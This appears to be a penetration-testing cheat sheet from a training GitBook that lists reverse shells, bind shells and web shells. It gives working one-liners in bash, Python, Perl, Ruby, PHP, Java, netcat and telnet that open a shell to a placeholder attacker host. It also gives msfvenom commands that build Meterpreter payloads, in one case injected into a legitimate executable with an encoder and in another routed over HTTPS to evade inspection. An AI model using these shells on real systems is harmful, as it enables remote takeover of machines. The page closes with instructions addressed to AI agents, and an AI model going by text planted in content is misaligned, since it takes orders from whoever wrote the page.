# Shells

## Reverse-shells <a href="#reverse-shells" id="reverse-shells"></a>

This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet:\
<https://highon.coffee/blog/reverse-shell-cheat-sheet/>

<http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>

#### Windows <a href="#windows" id="windows"></a>

**Meterpreter**

**Standard meterpreter**

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse.exe
```

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
```

**Meterpreter HTTPS**

It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.

```
msfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=443 -f exe -o met_https_reverse.exe
```

**Non-staged payload**

```
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exe
```

```
use exploit/multi/handler
set payload windows/shell_reverse_tcp
```

**Staged payload**i

```
This must be caught with metasploit. It does not work with netcat.
```

```
use exploit/multi/handler
set payload windows/shell/reverse_tcp
```

#### Inject payload into binary <a href="#inject-payload-into-binary" id="inject-payload-into-binary"></a>

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
```

### Linux <a href="#linux" id="linux"></a>

### Binary

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f elf > shell.elf
```

### Bash

```
0<&196;exec 196<>/dev/tcp/ip/80; sh <&196 >&196 2>&196
```

```
bash -i >& /dev/tcp/ip/8080 0>&1
```

### Php

```
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```

### Netcat

**Bind shell**

```
#Linux
nc -vlp 5555 -e /bin/bash
nc ip 5555

# Windows
nc.exe -nlvp 4444 -e cmd.exe
```

### **Reverse shell**

```
# Linux
nc -lvp 5555
nc ip 5555 -e /bin/bash

# Windows
nc -lvp 443
nc.exe ip 443 -e cmd.exe
```

### **With -e flag**

```
nc -e /bin/sh ATTACKING-IP 80
```

```
/bin/sh | nc ATTACKING-IP 80
```

**Without -e flag**

```
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
```

### Ncat

Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentestjob you might not want to communicate unencrypted.

Bind

```
ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
ncat -v ip 5555 --ssl
```

### Telnet

```
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
```

```
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```

### Perl

```
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### Ruby

```
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

#### Java <a href="#java" id="java"></a>

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

### Python

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Web-shells  <a href="#web-shells---platform-independent" id="web-shells---platform-independent"></a>

### PHP

This php-shell is OS-independent. You can use it on both Linux and Windows.

```
msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.php
```

### ASP

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f asp > shell.asp
```

### WAR

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f war > shell.war
```

### JSP

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.jsp
```

[<br>](https://sushant747.gitbooks.io/total-oscp-guide/webshell.html)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infosecsanyam261.gitbook.io/tryharder/shells.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.